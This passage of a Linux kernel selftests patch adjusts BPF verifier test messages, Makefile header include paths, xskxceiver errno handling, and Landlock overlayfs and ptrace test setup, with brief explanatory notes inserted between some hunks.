+ 	$(Q)$(CLANG) $(filter-out -static,$(CFLAGS) $(LDFLAGS)) $(filter %.c,$^) \
+-		     liburandom_read.so $(LDLIBS)			       \
++		     liburandom_read.so $(filter-out -static,$(LDLIBS))	     \
+ 		     -fuse-ld=$(LLD) -Wl,-znoseparate-code -Wl,--build-id=sha1 \
+ 		     -Wl,-rpath=. -o $@
+ 
+diff --git a/tools/testing/selftests/bpf/prog_tests/kfunc_dynptr_param.c b/tools/testing/selftests/bpf/prog_tests/kfunc_dynptr_param.c
+index a9229260a6cec..72800b1e8395a 100644
+--- a/tools/testing/selftests/bpf/prog_tests/kfunc_dynptr_param.c
++++ b/tools/testing/selftests/bpf/prog_tests/kfunc_dynptr_param.c
+@@ -18,7 +18,7 @@ static struct {
+ 	const char *expected_verifier_err_msg;
+ 	int expected_runtime_err;
+ } kfunc_dynptr_tests[] = {
+-	{"not_valid_dynptr", "Expected an initialized dynptr as arg #1", 0},
++	{"not_valid_dynptr", "cannot pass in dynptr at an offset=-8", 0},
+ 	{"not_ptr_to_stack", "arg#0 expected pointer to stack or dynptr_ptr", 0},
+ 	{"dynptr_data_null", NULL, -EBADMSG},
+ };
+diff --git a/tools/testing/selftests/bpf/prog_tests/xdp_do_redirect.c b/tools/testing/selftests/bpf/prog_tests/xdp_do_redirect.c
+index a50971c6cf4a5..ac70e871d62f8 100644
+--- a/tools/testing/selftests/bpf/prog_tests/xdp_do_redirect.c
++++ b/tools/testing/selftests/bpf/prog_tests/xdp_do_redirect.c
+@@ -65,7 +65,11 @@ static int attach_tc_prog(struct bpf_tc_hook *hook, int fd)
+ /* The maximum permissible size is: PAGE_SIZE - sizeof(struct xdp_page_head) -
+  * sizeof(struct skb_shared_info) - XDP_PACKET_HEADROOM = 3368 bytes
+  */
++#if defined(__s390x__)
++#define MAX_PKT_SIZE 3176
++#else
+ #define MAX_PKT_SIZE 3368
++#endif
+ static void test_max_pkt_size(int fd)
+ {
+ 	char data[MAX_PKT_SIZE + 1] = {};
+diff --git a/tools/testing/selftests/bpf/progs/dynptr_fail.c b/tools/testing/selftests/bpf/progs/dynptr_fail.c
+index 78debc1b38207..9dc3f23a82707 100644
+--- a/tools/testing/selftests/bpf/progs/dynptr_fail.c
++++ b/tools/testing/selftests/bpf/progs/dynptr_fail.c
+@@ -382,7 +382,7 @@ int invalid_helper1(void *ctx)
+ 
+ /* A dynptr can't be passed into a helper function at a non-zero offset */
+ SEC("?raw_tp")
+-__failure __msg("Expected an initialized dynptr as arg #3")
++__failure __msg("cannot pass in dynptr at an offset=-8")
+ int invalid_helper2(void *ctx)
+ {
+ 	struct bpf_dynptr ptr;
+@@ -420,7 +420,7 @@ int invalid_write1(void *ctx)
+  * offset
+  */
+ SEC("?raw_tp")
+-__failure __msg("Expected an initialized dynptr as arg #3")
++__failure __msg("cannot overwrite referenced dynptr")
+ int invalid_write2(void *ctx)
+ {
+ 	struct bpf_dynptr ptr;
+@@ -444,7 +444,7 @@ int invalid_write2(void *ctx)
+  * non-const offset
+  */
+ SEC("?raw_tp")
+-__failure __msg("Expected an initialized dynptr as arg #1")
++__failure __msg("cannot overwrite referenced dynptr")
+ int invalid_write3(void *ctx)
+ {
+ 	struct bpf_dynptr ptr;
+@@ -476,7 +476,7 @@ static int invalid_write4_callback(__u32 index, void *data)
+  * be invalidated as a dynptr
+  */
+ SEC("?raw_tp")
+-__failure __msg("arg 1 is an unacquired reference")
++__failure __msg("cannot overwrite referenced dynptr")
+ int invalid_write4(void *ctx)
+ {
+ 	struct bpf_dynptr ptr;
+@@ -584,7 +584,7 @@ int invalid_read4(void *ctx)
+ 
+ /* Initializing a dynptr on an offset should fail */
+ SEC("?raw_tp")
+-__failure __msg("invalid write to stack")
++__failure __msg("cannot pass in dynptr at an offset=0")
+ int invalid_offset(void *ctx)
+ {
+ 	struct bpf_dynptr ptr;
+diff --git a/tools/testing/selftests/bpf/progs/map_kptr.c b/tools/testing/selftests/bpf/progs/map_kptr.c
+index eb82178034934..228ec45365a8d 100644
+--- a/tools/testing/selftests/bpf/progs/map_kptr.c
++++ b/tools/testing/selftests/bpf/progs/map_kptr.c
+@@ -62,21 +62,23 @@ extern struct prog_test_ref_kfunc *
+ bpf_kfunc_call_test_kptr_get(struct prog_test_ref_kfunc **p, int a, int b) __ksym;
+ extern void bpf_kfunc_call_test_release(struct prog_test_ref_kfunc *p) __ksym;
+ 
++#define WRITE_ONCE(x, val) ((*(volatile typeof(x) *) &(x)) = (val))
++
+ static void test_kptr_unref(struct map_value *v)
+ {
+ 	struct prog_test_ref_kfunc *p;
+ 
+ 	p = v->unref_ptr;
+ 	/* store untrusted_ptr_or_null_ */
+-	v->unref_ptr = p;
++	WRITE_ONCE(v->unref_ptr, p);
+ 	if (!p)
+ 		return;
+ 	if (p->a + p->b > 100)
+ 		return;
+ 	/* store untrusted_ptr_ */
+-	v->unref_ptr = p;
++	WRITE_ONCE(v->unref_ptr, p);
+ 	/* store NULL */
+-	v->unref_ptr = NULL;
++	WRITE_ONCE(v->unref_ptr, NULL);
+ }
+ 
+ static void test_kptr_ref(struct map_value *v)
+@@ -85,7 +87,7 @@ static void test_kptr_ref(struct map_value *v)
+ 
+ 	p = v->ref_ptr;
+ 	/* store ptr_or_null_ */
+-	v->unref_ptr = p;
++	WRITE_ONCE(v->unref_ptr, p);
+ 	if (!p)
+ 		return;
+ 	if (p->a + p->b > 100)
+@@ -99,7 +101,7 @@ static void test_kptr_ref(struct map_value *v)
+ 		return;
+ 	}
+ 	/* store ptr_ */
+-	v->unref_ptr = p;
++	WRITE_ONCE(v->unref_ptr, p);
+ 	bpf_kfunc_call_test_release(p);
+ 
+ 	p = bpf_kfunc_call_test_acquire(&(unsigned long){0});
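The WRITE_ONCE() added above is the kernel's volatile-cast store, open-coded in the test; presumably the point is that the compiler must emit each store exactly once, in order, so the verifier sees the kptr stores the test intends to exercise. A standalone illustration of the construct:

#include <stdio.h>

#define WRITE_ONCE(x, val) ((*(volatile typeof(x) *) &(x)) = (val))

static int shared;

int main(void)
{
	/*
	 * The volatile cast forbids the compiler from eliding,
	 * merging, or duplicating the store; it does not add any
	 * ordering against other CPUs.
	 */
	WRITE_ONCE(shared, 42);
	printf("%d\n", shared);
	return 0;
}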
+diff --git a/tools/testing/selftests/bpf/progs/test_bpf_nf.c b/tools/testing/selftests/bpf/progs/test_bpf_nf.c
+index 227e85e85ddaf..9fc603c9d673e 100644
+--- a/tools/testing/selftests/bpf/progs/test_bpf_nf.c
++++ b/tools/testing/selftests/bpf/progs/test_bpf_nf.c
+@@ -34,6 +34,11 @@ __be16 dport = 0;
+ int test_exist_lookup = -ENOENT;
+ u32 test_exist_lookup_mark = 0;
+ 
++enum nf_nat_manip_type___local {
++	NF_NAT_MANIP_SRC___local,
++	NF_NAT_MANIP_DST___local
++};
++
+ struct nf_conn;
+ 
+ struct bpf_ct_opts___local {
+@@ -58,7 +63,7 @@ int bpf_ct_change_timeout(struct nf_conn *, u32) __ksym;
+ int bpf_ct_set_status(struct nf_conn *, u32) __ksym;
+ int bpf_ct_change_status(struct nf_conn *, u32) __ksym;
+ int bpf_ct_set_nat_info(struct nf_conn *, union nf_inet_addr *,
+-			int port, enum nf_nat_manip_type) __ksym;
++			int port, enum nf_nat_manip_type___local) __ksym;
+ 
+ static __always_inline void
+ nf_ct_test(struct nf_conn *(*lookup_fn)(void *, struct bpf_sock_tuple *, u32,
+@@ -157,10 +162,10 @@ nf_ct_test(struct nf_conn *(*lookup_fn)(void *, struct bpf_sock_tuple *, u32,
+ 
+ 		/* snat */
+ 		saddr.ip = bpf_get_prandom_u32();
+-		bpf_ct_set_nat_info(ct, &saddr, sport, NF_NAT_MANIP_SRC);
++		bpf_ct_set_nat_info(ct, &saddr, sport, NF_NAT_MANIP_SRC___local);
+ 		/* dnat */
+ 		daddr.ip = bpf_get_prandom_u32();
+-		bpf_ct_set_nat_info(ct, &daddr, dport, NF_NAT_MANIP_DST);
++		bpf_ct_set_nat_info(ct, &daddr, dport, NF_NAT_MANIP_DST___local);
+ 
+ 		ct_ins = bpf_ct_insert_entry(ct);
+ 		if (ct_ins) {
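The ___local suffix is not decoration: libbpf treats everything from the first "___" in a type name as a local "flavor" and drops it when matching the name against kernel BTF, so the program can carry its own copy of nf_nat_manip_type even when vmlinux.h omits it. A hedged sketch of the same convention applied to a struct (illustrative field; the attribute requests CO-RE field relocations):

struct task_struct___local {
	int pid;	/* relocated against the kernel's task_struct */
} __attribute__((preserve_access_index));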
+diff --git a/tools/testing/selftests/bpf/xdp_synproxy.c b/tools/testing/selftests/bpf/xdp_synproxy.c
+index 410a1385a01dd..6dbe0b7451985 100644
+--- a/tools/testing/selftests/bpf/xdp_synproxy.c
++++ b/tools/testing/selftests/bpf/xdp_synproxy.c
+@@ -116,6 +116,7 @@ static void parse_options(int argc, char *argv[], unsigned int *ifindex, __u32 *
+ 	*tcpipopts = 0;
+ 	*ports = NULL;
+ 	*single = false;
++	*tc = false;
+ 
+ 	while (true) {
+ 		int opt;
+diff --git a/tools/testing/selftests/bpf/xskxceiver.c b/tools/testing/selftests/bpf/xskxceiver.c
+index 162d3a516f2ca..1b9f48daa2257 100644
+--- a/tools/testing/selftests/bpf/xskxceiver.c
++++ b/tools/testing/selftests/bpf/xskxceiver.c
+@@ -350,7 +350,7 @@ static bool ifobj_zc_avail(struct ifobject *ifobject)
+ 	umem = calloc(1, sizeof(struct xsk_umem_info));
+ 	if (!umem) {
+ 		munmap(bufs, umem_sz);
+-		exit_with_error(-ENOMEM);
++		exit_with_error(ENOMEM);
+ 	}
+ 	umem->frame_size = XSK_UMEM__DEFAULT_FRAME_SIZE;
+ 	ret = xsk_configure_umem(umem, bufs, umem_sz);
+@@ -767,7 +767,7 @@ static void pkt_dump(void *pkt, u32 len)
+ 	struct ethhdr *ethhdr;
+ 	struct udphdr *udphdr;
+ 	struct iphdr *iphdr;
+-	int payload, i;
++	u32 payload, i;
+ 
+ 	ethhdr = pkt;
+ 	iphdr = pkt + sizeof(*ethhdr);
+@@ -792,7 +792,7 @@ static void pkt_dump(void *pkt, u32 len)
+ 	fprintf(stdout, "DEBUG>> L4: udp_hdr->src: %d\n", ntohs(udphdr->source));
+ 	fprintf(stdout, "DEBUG>> L4: udp_hdr->dst: %d\n", ntohs(udphdr->dest));
+ 	/*extract L5 frame */
+-	payload = *((uint32_t *)(pkt + PKT_HDR_SIZE));
++	payload = ntohl(*((u32 *)(pkt + PKT_HDR_SIZE)));
+ 
+ 	fprintf(stdout, "DEBUG>> L5: payload: %d\n", payload);
+ 	fprintf(stdout, "---------------------------------------\n");
+@@ -936,7 +936,7 @@ static int receive_pkts(struct test_spec *test, struct pollfd *fds)
+ 		if (ifobj->use_poll) {
+ 			ret = poll(fds, 1, POLL_TMOUT);
+ 			if (ret < 0)
+-				exit_with_error(-ret);
++				exit_with_error(errno);
+ 
+ 			if (!ret) {
+ 				if (!is_umem_valid(test->ifobj_tx))
+@@ -963,7 +963,7 @@ static int receive_pkts(struct test_spec *test, struct pollfd *fds)
+ 				if (xsk_ring_prod__needs_wakeup(&umem->fq)) {
+ 					ret = poll(fds, 1, POLL_TMOUT);
+ 					if (ret < 0)
+-						exit_with_error(-ret);
++						exit_with_error(errno);
+ 				}
+ 				ret = xsk_ring_prod__reserve(&umem->fq, rcvd, &idx_fq);
+ 			}
+@@ -1015,7 +1015,7 @@ static int __send_pkts(struct ifobject *ifobject, u32 *pkt_nb, struct pollfd *fd
+ 			if (timeout) {
+ 				if (ret < 0) {
+ 					ksft_print_msg("ERROR: [%s] Poll error %d\n",
+-						       __func__, ret);
++						       __func__, errno);
+ 					return TEST_FAILURE;
+ 				}
+ 				if (ret == 0)
+@@ -1024,7 +1024,7 @@ static int __send_pkts(struct ifobject *ifobject, u32 *pkt_nb, struct pollfd *fd
+ 			}
+ 			if (ret <= 0) {
+ 				ksft_print_msg("ERROR: [%s] Poll error %d\n",
+-					       __func__, ret);
++					       __func__, errno);
+ 				return TEST_FAILURE;
+ 			}
+ 		}
+@@ -1323,18 +1323,18 @@ static void thread_common_ops(struct test_spec *test, struct ifobject *ifobject)
+ 	if (ifobject->xdp_flags & XDP_FLAGS_SKB_MODE) {
+ 		if (opts.attach_mode != XDP_ATTACHED_SKB) {
+ 			ksft_print_msg("ERROR: [%s] XDP prog not in SKB mode\n");
+-			exit_with_error(-EINVAL);
++			exit_with_error(EINVAL);
+ 		}
+ 	} else if (ifobject->xdp_flags & XDP_FLAGS_DRV_MODE) {
+ 		if (opts.attach_mode != XDP_ATTACHED_DRV) {
+ 			ksft_print_msg("ERROR: [%s] XDP prog not in DRV mode\n");
+-			exit_with_error(-EINVAL);
++			exit_with_error(EINVAL);
+ 		}
+ 	}
+ 
+ 	ret = xsk_socket__update_xskmap(ifobject->xsk->xsk, ifobject->xsk_map_fd);
+ 	if (ret)
+-		exit_with_error(-ret);
++		exit_with_error(errno);
+ }
+ 
+ static void *worker_testapp_validate_tx(void *arg)
+@@ -1541,7 +1541,7 @@ static void swap_xsk_resources(struct ifobject *ifobj_tx, struct ifobject *ifobj
+ 
+ 	ret = xsk_socket__update_xskmap(ifobj_rx->xsk->xsk, ifobj_rx->xsk_map_fd);
+ 	if (ret)
+-		exit_with_error(-ret);
++		exit_with_error(errno);
+ }
+ 
+ static void testapp_bpf_res(struct test_spec *test)
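The xskxceiver hunks all enforce one convention: exit_with_error() and strerror() want a positive errno, which after a failing syscall lives in errno, while library-style helpers return the negative form that must be negated first. Passing a negated return such as -ret when ret is simply -1 hands strerror() a meaningless code. A small runnable illustration of the two styles:

#include <errno.h>
#include <stdio.h>
#include <string.h>

static void report(int err)		/* expects a positive errno */
{
	fprintf(stderr, "error %d: %s\n", err, strerror(err));
}

int main(void)
{
	if (!fopen("/nonexistent", "r"))
		report(errno);		/* syscall style: read errno */

	int ret = -ENOMEM;		/* library style: negative return */
	if (ret < 0)
		report(-ret);		/* negate before reporting */
	return 0;
}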
+diff --git a/tools/testing/selftests/clone3/Makefile b/tools/testing/selftests/clone3/Makefile
+index 79b19a2863a0b..84832c369a2ea 100644
+--- a/tools/testing/selftests/clone3/Makefile
++++ b/tools/testing/selftests/clone3/Makefile
+@@ -1,5 +1,5 @@
+ # SPDX-License-Identifier: GPL-2.0
+-CFLAGS += -g -std=gnu99 -I../../../../usr/include/
++CFLAGS += -g -std=gnu99 $(KHDR_INCLUDES)
+ LDLIBS += -lcap
+ 
+ TEST_GEN_PROGS := clone3 clone3_clear_sighand clone3_set_tid \
+diff --git a/tools/testing/selftests/core/Makefile b/tools/testing/selftests/core/Makefile
+index f6f2d6f473c6a..ce262d0972699 100644
+--- a/tools/testing/selftests/core/Makefile
++++ b/tools/testing/selftests/core/Makefile
+@@ -1,5 +1,5 @@
+ # SPDX-License-Identifier: GPL-2.0-only
+-CFLAGS += -g -I../../../../usr/include/
++CFLAGS += -g $(KHDR_INCLUDES)
+ 
+ TEST_GEN_PROGS := close_range_test
+ 
+diff --git a/tools/testing/selftests/dmabuf-heaps/Makefile b/tools/testing/selftests/dmabuf-heaps/Makefile
+index 604b43ece15f5..9e7e158d5fa32 100644
+--- a/tools/testing/selftests/dmabuf-heaps/Makefile
++++ b/tools/testing/selftests/dmabuf-heaps/Makefile
+@@ -1,5 +1,5 @@
+ # SPDX-License-Identifier: GPL-2.0
+-CFLAGS += -static -O3 -Wl,-no-as-needed -Wall
++CFLAGS += -static -O3 -Wl,-no-as-needed -Wall $(KHDR_INCLUDES)
+ 
+ TEST_GEN_PROGS = dmabuf-heap
+ 
+diff --git a/tools/testing/selftests/dmabuf-heaps/dmabuf-heap.c b/tools/testing/selftests/dmabuf-heaps/dmabuf-heap.c
+index 29af27acd40ea..890a8236a8ba7 100644
+--- a/tools/testing/selftests/dmabuf-heaps/dmabuf-heap.c
++++ b/tools/testing/selftests/dmabuf-heaps/dmabuf-heap.c
+@@ -13,10 +13,9 @@
+ #include <sys/types.h>
+ 
+ #include <linux/dma-buf.h>
++#include <linux/dma-heap.h>
+ #include <drm/drm.h>
+ 
+-#include "../../../../include/uapi/linux/dma-heap.h"
+-
+ #define DEVPATH "/dev/dma_heap"
+ 
+ static int check_vgem(int fd)
+diff --git a/tools/testing/selftests/drivers/dma-buf/Makefile b/tools/testing/selftests/drivers/dma-buf/Makefile
+index 79cb16b4e01a9..441407bb0e801 100644
+--- a/tools/testing/selftests/drivers/dma-buf/Makefile
++++ b/tools/testing/selftests/drivers/dma-buf/Makefile
+@@ -1,5 +1,5 @@
+ # SPDX-License-Identifier: GPL-2.0-only
+-CFLAGS += -I../../../../../usr/include/
++CFLAGS += $(KHDR_INCLUDES)
+ 
+ TEST_GEN_PROGS := udmabuf
+ 
+diff --git a/tools/testing/selftests/drivers/net/netdevsim/devlink.sh b/tools/testing/selftests/drivers/net/netdevsim/devlink.sh
+index a08c02abde121..7f7d20f222070 100755
+--- a/tools/testing/selftests/drivers/net/netdevsim/devlink.sh
++++ b/tools/testing/selftests/drivers/net/netdevsim/devlink.sh
+@@ -17,6 +17,18 @@ SYSFS_NET_DIR=/sys/bus/netdevsim/devices/$DEV_NAME/net/
+ DEBUGFS_DIR=/sys/kernel/debug/netdevsim/$DEV_NAME/
+ DL_HANDLE=netdevsim/$DEV_NAME
+ 
++wait_for_devlink()
++{
++	"$@" | grep -q $DL_HANDLE
++}
++
++devlink_wait()
++{
++	local timeout=$1
++
++	busywait "$timeout" wait_for_devlink devlink dev
++}
++
+ fw_flash_test()
+ {
+ 	RET=0
+@@ -256,6 +268,9 @@ netns_reload_test()
+ 	ip netns del testns2
+ 	ip netns del testns1
+ 
++	# Wait until netns async cleanup is done.
++	devlink_wait 2000
++
+ 	log_test "netns reload test"
+ }
+ 
+@@ -348,6 +363,9 @@ resource_test()
+ 	ip netns del testns2
+ 	ip netns del testns1
+ 
++	# Wait until netns async cleanup is done.
++	devlink_wait 2000
++
+ 	log_test "resource test"
+ }
+ 
+diff --git a/tools/testing/selftests/drivers/s390x/uvdevice/Makefile b/tools/testing/selftests/drivers/s390x/uvdevice/Makefile
+index 891215a7dc8a1..755d164384c46 100644
+--- a/tools/testing/selftests/drivers/s390x/uvdevice/Makefile
++++ b/tools/testing/selftests/drivers/s390x/uvdevice/Makefile
+@@ -11,10 +11,9 @@ else
+ TEST_GEN_PROGS := test_uvdevice
+ 
+ top_srcdir ?= ../../../../../..
+-khdr_dir = $(top_srcdir)/usr/include
+ LINUX_TOOL_ARCH_INCLUDE = $(top_srcdir)/tools/arch/$(ARCH)/include
+ 
+-CFLAGS += -Wall -Werror -static -I$(khdr_dir) -I$(LINUX_TOOL_ARCH_INCLUDE)
++CFLAGS += -Wall -Werror -static $(KHDR_INCLUDES) -I$(LINUX_TOOL_ARCH_INCLUDE)
+ 
+ include ../../../lib.mk
+ 
+diff --git a/tools/testing/selftests/filesystems/Makefile b/tools/testing/selftests/filesystems/Makefile
+index 129880fb42d34..c647fd6a0446a 100644
+--- a/tools/testing/selftests/filesystems/Makefile
++++ b/tools/testing/selftests/filesystems/Makefile
+@@ -1,6 +1,6 @@
+ # SPDX-License-Identifier: GPL-2.0
+ 
+-CFLAGS += -I../../../../usr/include/
++CFLAGS += $(KHDR_INCLUDES)
+ TEST_GEN_PROGS := devpts_pts
+ TEST_GEN_PROGS_EXTENDED := dnotify_test
+ 
+diff --git a/tools/testing/selftests/filesystems/binderfs/Makefile b/tools/testing/selftests/filesystems/binderfs/Makefile
+index 8af25ae960498..c2f7cef919c04 100644
+--- a/tools/testing/selftests/filesystems/binderfs/Makefile
++++ b/tools/testing/selftests/filesystems/binderfs/Makefile
+@@ -1,6 +1,6 @@
+ # SPDX-License-Identifier: GPL-2.0
+ 
+-CFLAGS += -I../../../../../usr/include/ -pthread
++CFLAGS += $(KHDR_INCLUDES) -pthread
+ TEST_GEN_PROGS := binderfs_test
+ 
+ binderfs_test: binderfs_test.c ../../kselftest.h ../../kselftest_harness.h
+diff --git a/tools/testing/selftests/filesystems/epoll/Makefile b/tools/testing/selftests/filesystems/epoll/Makefile
+index 78ae4aaf7141a..0788a7dc80042 100644
+--- a/tools/testing/selftests/filesystems/epoll/Makefile
++++ b/tools/testing/selftests/filesystems/epoll/Makefile
+@@ -1,6 +1,6 @@
+ # SPDX-License-Identifier: GPL-2.0
+ 
+-CFLAGS += -I../../../../../usr/include/
++CFLAGS += $(KHDR_INCLUDES)
+ LDLIBS += -lpthread
+ TEST_GEN_PROGS := epoll_wakeup_test
+ 
+diff --git a/tools/testing/selftests/ftrace/test.d/dynevent/eprobes_syntax_errors.tc b/tools/testing/selftests/ftrace/test.d/dynevent/eprobes_syntax_errors.tc
+index fc1daac7f0668..4f5e8c6651562 100644
+--- a/tools/testing/selftests/ftrace/test.d/dynevent/eprobes_syntax_errors.tc
++++ b/tools/testing/selftests/ftrace/test.d/dynevent/eprobes_syntax_errors.tc
+@@ -22,6 +22,8 @@ check_error 'e:foo/^bar.1 syscalls/sys_enter_openat'	# BAD_EVENT_NAME
+ check_error 'e:foo/bar syscalls/sys_enter_openat arg=^dfd'	# BAD_FETCH_ARG
+ check_error 'e:foo/bar syscalls/sys_enter_openat ^arg=$foo'	# BAD_ATTACH_ARG
+ 
+-check_error 'e:foo/bar syscalls/sys_enter_openat if ^'	# NO_EP_FILTER
++if grep -q '<attached-group>\.<attached-event>.*\[if <filter>\]' README; then
++  check_error 'e:foo/bar syscalls/sys_enter_openat if ^'	# NO_EP_FILTER
++fi
+ 
+ exit 0
+diff --git a/tools/testing/selftests/ftrace/test.d/ftrace/func_event_triggers.tc b/tools/testing/selftests/ftrace/test.d/ftrace/func_event_triggers.tc
+index 3eea2abf68f9e..2ad7d4b501cc1 100644
+--- a/tools/testing/selftests/ftrace/test.d/ftrace/func_event_triggers.tc
++++ b/tools/testing/selftests/ftrace/test.d/ftrace/func_event_triggers.tc
+@@ -42,7 +42,7 @@ test_event_enabled() {
+ 
+     while [ $check_times -ne 0 ]; do
+ 	e=`cat $EVENT_ENABLE`
+-	if [ "$e" == $val ]; then
++	if [ "$e" = $val ]; then
+ 	    return 0
+ 	fi
+ 	sleep $SLEEP_TIME
+diff --git a/tools/testing/selftests/ftrace/test.d/kprobe/probepoint.tc b/tools/testing/selftests/ftrace/test.d/kprobe/probepoint.tc
+index 624269c8d5343..68425987a5dd9 100644
+--- a/tools/testing/selftests/ftrace/test.d/kprobe/probepoint.tc
++++ b/tools/testing/selftests/ftrace/test.d/kprobe/probepoint.tc
+@@ -21,7 +21,7 @@ set_offs() { # prev target next
+ 
+ # We have to decode symbol addresses to get correct offsets.
+ # If the offset is not an instruction boundary, it cause -EILSEQ.
+-set_offs `grep -A1 -B1 ${TARGET_FUNC} /proc/kallsyms | cut -f 1 -d " " | xargs`
++set_offs `grep -v __pfx_ /proc/kallsyms | grep -A1 -B1 ${TARGET_FUNC} | cut -f 1 -d " " | xargs`
+ 
+ UINT_TEST=no
+ # printf "%x" -1 returns (unsigned long)-1.
+diff --git a/tools/testing/selftests/futex/functional/Makefile b/tools/testing/selftests/futex/functional/Makefile
+index 5a0e0df8de9b3..a392d0917b4e5 100644
+--- a/tools/testing/selftests/futex/functional/Makefile
++++ b/tools/testing/selftests/futex/functional/Makefile
+@@ -1,5 +1,5 @@
+ # SPDX-License-Identifier: GPL-2.0
+-INCLUDES := -I../include -I../../ -I../../../../../usr/include/
++INCLUDES := -I../include -I../../ $(KHDR_INCLUDES)
+ CFLAGS := $(CFLAGS) -g -O2 -Wall -D_GNU_SOURCE -pthread $(INCLUDES) $(KHDR_INCLUDES)
+ LDLIBS := -lpthread -lrt
+ 
+diff --git a/tools/testing/selftests/gpio/Makefile b/tools/testing/selftests/gpio/Makefile
+index 616ed40196554..e0884390447dc 100644
+--- a/tools/testing/selftests/gpio/Makefile
++++ b/tools/testing/selftests/gpio/Makefile
+@@ -3,6 +3,6 @@
+ TEST_PROGS := gpio-mockup.sh gpio-sim.sh
+ TEST_FILES := gpio-mockup-sysfs.sh
+ TEST_GEN_PROGS_EXTENDED := gpio-mockup-cdev gpio-chip-info gpio-line-name
+-CFLAGS += -O2 -g -Wall -I../../../../usr/include/ $(KHDR_INCLUDES)
++CFLAGS += -O2 -g -Wall $(KHDR_INCLUDES)
+ 
+ include ../lib.mk
+diff --git a/tools/testing/selftests/iommu/iommufd.c b/tools/testing/selftests/iommu/iommufd.c
+index 8aa8a346cf221..fa08209268c42 100644
+--- a/tools/testing/selftests/iommu/iommufd.c
++++ b/tools/testing/selftests/iommu/iommufd.c
+@@ -1259,7 +1259,7 @@ TEST_F(iommufd_mock_domain, user_copy)
+ 
+ 	test_cmd_destroy_access_pages(
+ 		access_cmd.id, access_cmd.access_pages.out_access_pages_id);
+-	test_cmd_destroy_access(access_cmd.id) test_ioctl_destroy(ioas_id);
++	test_cmd_destroy_access(access_cmd.id);
+ 
+ 	test_ioctl_destroy(ioas_id);
+ }
+diff --git a/tools/testing/selftests/ipc/Makefile b/tools/testing/selftests/ipc/Makefile
+index 1c4448a843a41..50e9c299fc4ae 100644
+--- a/tools/testing/selftests/ipc/Makefile
++++ b/tools/testing/selftests/ipc/Makefile
+@@ -10,7 +10,7 @@ ifeq ($(ARCH),x86_64)
+ 	CFLAGS := -DCONFIG_X86_64 -D__x86_64__
+ endif
+ 
+-CFLAGS += -I../../../../usr/include/
++CFLAGS += $(KHDR_INCLUDES)
+ 
+ TEST_GEN_PROGS := msgque
+ 
+diff --git a/tools/testing/selftests/kcmp/Makefile b/tools/testing/selftests/kcmp/Makefile
+index b4d39f6b5124d..59a1e53790181 100644
+--- a/tools/testing/selftests/kcmp/Makefile
++++ b/tools/testing/selftests/kcmp/Makefile
+@@ -1,5 +1,5 @@
+ # SPDX-License-Identifier: GPL-2.0-only
+-CFLAGS += -I../../../../usr/include/
++CFLAGS += $(KHDR_INCLUDES)
+ 
+ TEST_GEN_PROGS := kcmp_test
+ 
+diff --git a/tools/testing/selftests/landlock/fs_test.c b/tools/testing/selftests/landlock/fs_test.c
+index d5dab986f6125..b6c4be3faf7a9 100644
+--- a/tools/testing/selftests/landlock/fs_test.c
++++ b/tools/testing/selftests/landlock/fs_test.c
+@@ -11,6 +11,7 @@
+ #include <fcntl.h>
+ #include <linux/landlock.h>
+ #include <sched.h>
++#include <stdio.h>
+ #include <string.h>
+ #include <sys/capability.h>
+ #include <sys/mount.h>
+@@ -89,6 +90,40 @@ static const char dir_s3d3[] = TMP_DIR "/s3d1/s3d2/s3d3";
+  *         └── s3d3
+  */
+ 
++static bool fgrep(FILE *const inf, const char *const str)
++{
++	char line[32];
++	const int slen = strlen(str);
++
++	while (!feof(inf)) {
++		if (!fgets(line, sizeof(line), inf))
++			break;
++		if (strncmp(line, str, slen))
++			continue;
++
++		return true;
++	}
++
++	return false;
++}
++
++static bool supports_overlayfs(void)
++{
++	bool res;
++	FILE *const inf = fopen("/proc/filesystems", "r");
++
++	/*
++	 * Consider that the filesystem is supported if we cannot get the
++	 * supported ones.
++	 */
++	if (!inf)
++		return true;
++
++	res = fgrep(inf, "nodev\toverlay\n");
++	fclose(inf);
++	return res;
++}
++
+ static void mkdir_parents(struct __test_metadata *const _metadata,
+ 			  const char *const path)
+ {
+@@ -4001,6 +4036,9 @@ FIXTURE(layout2_overlay) {};
+ 
+ FIXTURE_SETUP(layout2_overlay)
+ {
++	if (!supports_overlayfs())
++		SKIP(return, "overlayfs is not supported");
++
+ 	prepare_layout(_metadata);
+ 
+ 	create_directory(_metadata, LOWER_BASE);
+@@ -4037,6 +4075,9 @@ FIXTURE_SETUP(layout2_overlay)
+ 
+ FIXTURE_TEARDOWN(layout2_overlay)
+ {
++	if (!supports_overlayfs())
++		SKIP(return, "overlayfs is not supported");
++
+ 	EXPECT_EQ(0, remove_path(lower_do1_fl3));
+ 	EXPECT_EQ(0, remove_path(lower_dl1_fl2));
+ 	EXPECT_EQ(0, remove_path(lower_fl1));
+@@ -4068,6 +4109,9 @@ FIXTURE_TEARDOWN(layout2_overlay)
+ 
+ TEST_F_FORK(layout2_overlay, no_restriction)
+ {
++	if (!supports_overlayfs())
++		SKIP(return, "overlayfs is not supported");
++
+ 	ASSERT_EQ(0, test_open(lower_fl1, O_RDONLY));
+ 	ASSERT_EQ(0, test_open(lower_dl1, O_RDONLY));
+ 	ASSERT_EQ(0, test_open(lower_dl1_fl2, O_RDONLY));
+@@ -4231,6 +4275,9 @@ TEST_F_FORK(layout2_overlay, same_content_different_file)
+ 	size_t i;
+ 	const char *path_entry;
+ 
++	if (!supports_overlayfs())
++		SKIP(return, "overlayfs is not supported");
++
+ 	/* Sets rules on base directories (i.e. outside overlay scope). */
+ 	ruleset_fd = create_ruleset(_metadata, ACCESS_RW, layer1_base);
+ 	ASSERT_LE(0, ruleset_fd);
+diff --git a/tools/testing/selftests/landlock/ptrace_test.c b/tools/testing/selftests/landlock/ptrace_test.c
+index c28ef98ff3ac1..55e7871631a19 100644
+--- a/tools/testing/selftests/landlock/ptrace_test.c
++++ b/tools/testing/selftests/landlock/ptrace_test.c
+@@ -19,6 +19,12 @@
+ 
+ #include "common.h"
+ 
++/* Copied from security/yama/yama_lsm.c */
++#define YAMA_SCOPE_DISABLED 0
++#define YAMA_SCOPE_RELATIONAL 1
++#define YAMA_SCOPE_CAPABILITY 2
++#define YAMA_SCOPE_NO_ATTACH 3
++
+ static void create_domain(struct __test_metadata *const _metadata)
+ {
+ 	int ruleset_fd;
+@@ -60,6 +66,25 @@ static int test_ptrace_read(const pid_t pid)
+ 	return 0;
+ }
+ 
++static int get_yama_ptrace_scope(void)
++{
++	int ret;
++	char buf[2] = {};
++	const int fd = open("/proc/sys/kernel/yama/ptrace_scope", O_RDONLY);
++
++	if (fd < 0)
++		return 0;
++
